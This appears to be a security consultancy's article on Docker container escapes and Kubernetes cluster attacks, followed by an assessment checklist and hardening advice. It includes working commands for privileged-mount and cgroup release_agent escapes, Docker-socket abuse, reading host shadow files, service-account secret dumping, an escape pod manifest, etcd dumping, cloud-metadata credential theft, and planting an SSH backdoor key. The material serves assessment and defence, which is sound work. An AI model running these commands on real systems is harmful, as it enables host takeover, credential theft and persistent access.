
Container Security: Escaping Docker and Attacking Kubernetes


Containers run on shared kernels. Unlike virtual machines, which interpose a hypervisor between a guest operating system and the hardware, containers share the host kernel directly. The isolation that makes containers appear separate comes from Linux namespaces and cgroups — kernel features that restrict visibility and resource access, not features that enforce hard security boundaries.

This distinction matters for security assessments. A misconfigured container is not just a compromised application. It is a foothold on the host, and in an orchestrated environment, potentially a path to every workload in the cluster.

The Privilege Hierarchy in Containerized Environments

Before examining specific escape paths, it helps to understand what "full compromise" means in each layer of a containerized stack.

Container process compromise means code execution within the container's filesystem and namespace with the container's privileges. The attacker can read files the application can read, make network connections the container's network policy allows, and interact with any APIs the container's service account can reach.

Host compromise means the container's isolation has been bypassed and the attacker has access to the underlying node — its filesystem, its processes, its network interfaces, and any other workloads running on it.

Cluster compromise means the attacker can deploy workloads, read secrets, and control configuration across the entire Kubernetes cluster, regardless of which namespace or node they started on.

Container escapes move an attacker from the first level to the second. Kubernetes misconfigurations often provide a direct path to the third.

Docker Container Escapes

Privileged Containers

The most direct path from container to host is the --privileged flag. A container launched with docker run --privileged has all Linux capabilities enabled, no seccomp profile enforced, and no AppArmor restrictions applied. The container can interact with the host kernel as if it were running natively.

The canonical escape is straightforward:

bash
# Inside a privileged container
fdisk -l                          # identify host block devices
mkdir /mnt/host
mount /dev/xvda1 /mnt/host        # mount the host filesystem
chroot /mnt/host                  # enter the host root

After the chroot, the attacker operates in the host filesystem with root privileges. Adding a backdoor user, writing an SSH authorized key, or installing a cron job is trivial from this position.
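The persistence step is simple to sketch. A hedged example, parameterized over a root prefix so the logic can be exercised against a scratch directory rather than a real host (the key and paths are illustrative; after a real chroot the prefix would simply be /):

```shell
# Plant an SSH authorized key under a given root prefix.
# On a compromised host post-chroot, root would be "/"; here it is a
# scratch directory so the steps can be inspected safely.
plant_key() {
  local root=$1 key=$2
  mkdir -p "$root/root/.ssh"
  printf '%s\n' "$key" >> "$root/root/.ssh/authorized_keys"
  chmod 700 "$root/root/.ssh"
  chmod 600 "$root/root/.ssh/authorized_keys"
}

plant_key /tmp/demo-root 'ssh-ed25519 AAAA...demo attacker@demo'
cat /tmp/demo-root/root/.ssh/authorized_keys
```

The same pattern covers the cron variant: append a line to `$root/etc/crontab` and the host's cron daemon executes it.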

A second path that does not require knowing the block device is abusing host cgroup access:

bash
# Privileged containers can write to host cgroup release agents
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)   # overlayfs upperdir = this container's writable layer, as seen from the host
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "id > $host_path/output" >> /cmd    # payload; output lands in this container's /output
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# The release agent executes on the host when the cgroup empties

This technique executes a command on the host through the cgroup release agent mechanism without requiring the host filesystem to be mounted first.

Mounted Docker Socket

The Docker socket (/var/run/docker.sock) is the Unix socket through which Docker clients communicate with the Docker daemon. The daemon runs as root and has full control over every container on the host.

When a container has the Docker socket bind-mounted into it — a practice common in CI/CD environments where pipelines need to build and run containers — any process in that container can talk to the Docker daemon directly.

bash
# Inside a container with /var/run/docker.sock mounted
docker run -v /:/host -it --rm ubuntu:22.04 chroot /host

This single command, executed from inside a container with socket access, instructs the daemon to create a new container with the host's root filesystem bind-mounted at /host, then chroots into it for a shell with host root access. The new container does not even need the --privileged flag: the daemon runs as root on the host and performs the bind mount on the container's behalf. The container process effectively controls the Docker daemon and can use it to escape.

Testing for a mounted Docker socket requires only checking whether the path exists and is writable. Curl against the Docker API socket confirms accessibility:

bash
curl --unix-socket /var/run/docker.sock http://localhost/version

A successful response confirms full Docker API access and immediate host compromise potential.

Host Namespace Sharing

Docker allows specific host namespaces to be shared with containers: --pid=host, --network=host, --ipc=host. Each trades isolation for capability in ways that create security exposure.

--pid=host is particularly dangerous from an assessment perspective. A container with host PID namespace access can see all processes running on the host and send signals to them. More practically, it can access /proc/<pid>/root for any host process, which is a symlink to the root filesystem of the process's mount namespace — the host filesystem:

bash
# Inside a container with --pid=host
ls /proc/1/root/           # lists the host root filesystem
cp /proc/1/root/etc/shadow /tmp/shadow   # reads host shadow file

--network=host places the container in the host's network namespace, making it possible to listen on host ports and access host network interfaces directly — bypassing any container network policy that would otherwise restrict traffic.

Kubernetes Cluster Attacks

Service Account Token Abuse

Every Kubernetes pod runs under a service account. Unless the pod spec sets automountServiceAccountToken: false, a JWT token for the service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The token can authenticate to the Kubernetes API server:

bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc
 
# Enumerate what the service account can do
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/namespaces/default/secrets"

The critical question is what RBAC permissions are bound to the service account. Even if no explicit role binding exists, Kubernetes ships with a system:discovery role that is bound to all authenticated users by default, allowing the token to enumerate cluster resources.

More dangerous is the common pattern of binding the cluster-admin ClusterRole to the default service account in a namespace, or granting the get verb on secrets to a service account that runs an application handling untrusted input. With get on secrets at cluster scope, the token can read every secret in every namespace — including other applications' database credentials, TLS private keys, and tokens for external services.

RBAC Privilege Escalation

RBAC misconfigurations fall into predictable patterns. The most impactful:

Wildcard permissions on resources. A role with verbs: ['*'] on resources: ['*'] is equivalent to cluster-admin for the service account. Wildcards in RBAC rules appear frequently when administrators create roles quickly and intend to restrict them later.

Create-pod access. A service account that can create pods can create a privileged pod with hostPID: true, hostNetwork: true, and a hostPath volume mounting the host filesystem. This is a full host escape through the API server:

yaml
apiVersion: v1
kind: Pod
metadata:
  name: escape
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    command: ["/bin/bash"]
    args: ["-c", "chroot /host bash"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /

Manage-roles or bind-clusterroles access. The ability to create or modify role bindings is effectively the ability to grant oneself any permission in the cluster. An attacker with create on rolebindings can create a binding that grants cluster-admin to their service account.

Exec into pods. The pods/exec subresource allows attaching to running containers. An attacker with this permission can execute commands in any pod in scope — including sensitive workloads like database administrators, secrets managers, or monitoring agents.

etcd Access

etcd is the key-value store that Kubernetes uses to persist all cluster state — including every Secret object, every Service Account token, and all configuration. By default, Kubernetes secrets are stored in etcd with only base64 encoding, not encrypted at rest.
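Base64 is an encoding, not encryption: a value lifted from a Secret object or an etcd dump decodes with standard tools and no key material (the value here is made up):

```shell
# A Secret's "data" field as returned by the API or stored in etcd
encoded="cGFzc3dvcmQxMjM="

# Decoding requires nothing beyond base64 itself
printf '%s' "$encoded" | base64 -d   # -> password123
```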

An attacker with network access to the etcd endpoint (typically port 2379) and a valid client certificate can dump the entire cluster state:

bash
etcdctl --endpoints=https://etcd-host:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only

etcd should only be accessible from the API server and should require mutual TLS with a restricted CA. Assessment targets where etcd listens on a broader interface, or where the certificates are accessible from within a compromised pod, represent critical findings.

Cloud Metadata Endpoint Access

In cloud-managed Kubernetes environments, each node is a cloud instance with an associated instance metadata endpoint. On AWS, this is the Instance Metadata Service at 169.254.169.254. On GCP it is metadata.google.internal. On Azure it is also 169.254.169.254, with a different API that requires a Metadata: true request header.

The metadata endpoint returns temporary credentials for the instance's IAM role without authentication. If the node's instance role has permissions beyond what the cluster itself needs — common when operators grant broad cloud API access for node autoscaling, load balancer management, or storage provisioning — any pod running on that node can retrieve those credentials:

bash
# From inside a pod on AWS
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/node-role
# Returns AccessKeyId, SecretAccessKey, SessionToken

With these credentials, the attacker can make calls to the cloud API with the permissions of the node role — potentially listing and downloading S3 buckets, describing EC2 infrastructure, assuming other IAM roles, or escalating further within the cloud environment.

IMDSv2 (AWS) requires a session-oriented request with a token obtained via PUT, which adds a layer of protection. But it only applies if explicitly configured. Clusters that have not enforced IMDSv2 on their node groups remain exposed.

Network policy can block pods from reaching 169.254.169.254, but only if network policy is enforced and the relevant egress rules are present.

Assessment Methodology

A container security assessment follows a consistent progression from the inside out.

From within a pod:

  1. Read the mounted service account token and query the API server — enumerate what the token can do
  2. Check for /var/run/docker.sock — its presence enables immediate host compromise
  3. Check the pod's security context: grep Cap /proc/1/status reveals the capability masks; a full CapEff value of 0000003fffffffff indicates privileged: true
  4. Attempt to reach the cloud metadata endpoint — a successful response warrants credential retrieval and cloud privilege analysis
  5. Check environment variables for secrets passed as env vars rather than volumes
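Step 3 can go beyond eyeballing the mask. A sketch, assuming the standard bit positions from linux/capability.h (CAP_SYS_ADMIN is bit 21), decodes the CapEff hex value to test for a specific capability:

```shell
# cap_has MASK BIT: report whether capability bit BIT is set in the
# hex CapEff mask taken from /proc/1/status (or /proc/self/status)
cap_has() {
  local mask=$((16#$1)) bit=$2
  if (( (mask >> bit) & 1 )); then echo yes; else echo no; fi
}

cap_has 0000003fffffffff 21   # full privileged mask -> yes
cap_has 00000000a80425fb 21   # Docker's default mask -> no
```

A CapEff of 0000003fffffffff is the full capability set and a strong indicator of a privileged container; Docker's default unprivileged mask is 00000000a80425fb.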

From the Kubernetes API:

  1. Enumerate ClusterRoleBindings for the default service account and any application service accounts
  2. Look for any subject with create access to pods, role bindings, or cluster role bindings
  3. Check for secrets accessible to assessed service accounts — the presence of dockerconfigjson secrets or cloud credentials in secrets indicates infrastructure-level access
  4. Review admission controller configuration — the absence of a pod security admission policy or OPA/Gatekeeper allows arbitrary pod specs including privileged workloads

Infrastructure review:

  1. Confirm etcd is not accessible from the pod network
  2. Confirm the API server's anonymous-auth is disabled
  3. Verify that node instance roles follow least privilege
  4. Check whether network policy enforces egress restrictions to the metadata endpoint

Hardening Guidance

The most impactful mitigations reduce the blast radius when a workload is compromised.

Disable service account token auto-mounting for pods that do not need API server access. Set automountServiceAccountToken: false in the pod spec or the service account itself.
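A minimal pod spec with auto-mounting disabled might look like this (name and image are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: worker
spec:
  # no token appears under /var/run/secrets/kubernetes.io/serviceaccount
  automountServiceAccountToken: false
  containers:
  - name: app
    image: registry.example.com/app:1.0
```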

Apply Pod Security Standards using Kubernetes' built-in admission controller. The restricted profile prohibits privileged containers, host namespace sharing, and host volume mounts. The baseline profile blocks the most common escape vectors while permitting most legitimate workloads.
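With the built-in Pod Security Admission controller, enforcement is configured through namespace labels; a sketch, with an illustrative namespace name:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: app-prod
  labels:
    # reject pods that violate the restricted profile
    pod-security.kubernetes.io/enforce: restricted
    # additionally surface warnings for restricted-profile violations
    pod-security.kubernetes.io/warn: restricted
```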

Enforce least-privilege RBAC. Audit ClusterRoleBindings regularly. The default service account should have no bindings beyond the cluster defaults. Application service accounts should have narrowly scoped roles in their namespace only.
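A narrowly scoped role grants only the verbs and resources the workload demonstrably needs; an illustrative example:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: app-prod        # scoped to one namespace, not cluster-wide
  name: configmap-reader
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]     # no create, no secrets, no wildcards
```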

Block cloud metadata endpoints with network policy egress rules that deny traffic to link-local addresses from all pods except those that specifically require it.
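One way to express this, assuming a CNI plugin that actually enforces NetworkPolicy, is an egress rule that allows everything except the metadata address:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-egress
  namespace: app-prod              # applied per namespace; name illustrative
spec:
  podSelector: {}                  # all pods in the namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32     # the cloud metadata endpoint
```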

Enable etcd encryption at rest using Kubernetes' EncryptionConfiguration. An attacker who reads etcd directly or obtains an etcd backup then recovers ciphertext rather than base64-encoded plaintext; it does not stop an attacker who can reach the API server, or the encryption keys stored alongside it.

Audit container images for setuid binaries and excessive capabilities. The presence of nsenter, mount, fdisk, or other administrative binaries in a container image expands the options available to an attacker who achieves code execution.

Container security is layered. No single control makes a cluster uncompromisable. The goal is to ensure that a container compromise does not automatically translate to host or cluster compromise — and that each step toward escalation is visible in logs.

For a technical assessment of your containerized infrastructure, get in touch.


Summary

Containers offer process isolation, not security boundaries. Privileged containers, exposed Docker sockets, misconfigured Kubernetes RBAC, and accessible cloud metadata endpoints all create paths from a compromised container to full cluster or host compromise. Understanding these vectors is essential for assessing environments that rely on containerization as part of their security model.

Key Takeaways

  • Containers are not security boundaries — a privileged container has direct access to the host kernel and can escape to full host compromise in a single command
  • An exposed Docker socket inside a container gives the container process full control over the Docker daemon, equivalent to root on the host
  • Kubernetes service account tokens are automatically mounted into pods by default and can be used to query the API server with whatever RBAC permissions are assigned to the service account
  • RBAC misconfiguration in Kubernetes is the most common path to cluster-wide privilege escalation — overly permissive roles on default service accounts are frequently present in production clusters
  • Cloud metadata endpoints accessible from within pods can return instance credentials with permissions far exceeding what the application requires

Frequently Asked Questions

What is a container escape?

A container escape is a technique that allows a process running inside a container to access resources outside the container's intended isolation boundary — typically the host operating system, other containers on the same host, or the container orchestration layer. Container escapes exploit misconfiguration (privileged mode, host namespace sharing, mounted Docker sockets) rather than kernel vulnerabilities in most assessed environments. A successful container escape typically gives an attacker the equivalent of root on the host or the ability to deploy and control workloads across a cluster.

How does a privileged Docker container lead to host compromise?

A privileged Docker container has all Linux capabilities enabled and no seccomp or AppArmor restrictions. The most direct escape path is mounting the host filesystem: from inside a container started with docker run --privileged, running mount /dev/sda1 /mnt gives read-write access to the host's root filesystem. An attacker can add a cron job or SSH authorized key to the host filesystem, which the host's own cron daemon or SSH service then honors. The container process and the host share the same kernel, and privileged mode removes all the access controls that make kernel sharing safe.

Why is an exposed Docker socket inside a container dangerous?

An exposed Docker socket (/var/run/docker.sock) allows the container to communicate with the Docker daemon running on the host, with full API access. This means the container can spawn new containers with any configuration — including privileged containers with the host filesystem mounted. An attacker who gains code execution inside a container with the Docker socket mounted can immediately escalate to full host compromise by creating a new privileged container and using it as a foothold. The Docker socket is effectively a root backdoor when accessible from an untrusted workload.

How can a Kubernetes service account token be abused?

Every pod in Kubernetes is assigned a service account, and a JWT token for that service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token inside the pod. This token can authenticate to the Kubernetes API server. If the service account has permissive RBAC bindings — particularly if it has access to create pods, get secrets, or modify cluster roles — an attacker with code execution in the pod can use the token to query or modify cluster state, read other pods' secrets, or create a new privileged pod on any node.

Why are cloud metadata endpoints a risk for Kubernetes workloads?

Cloud provider metadata endpoints (such as the instance metadata service on AWS, GCP, and Azure) are accessible from workloads running on cloud-managed Kubernetes nodes unless explicitly blocked by network policy. These endpoints return instance identity information and, critically, temporary credentials for the instance's IAM role. If the node's instance role has broad permissions — which is common when cluster autoscaler or other components need cloud API access — any pod running on that node can retrieve credentials that allow cloud API calls outside the cluster's intended security perimeter.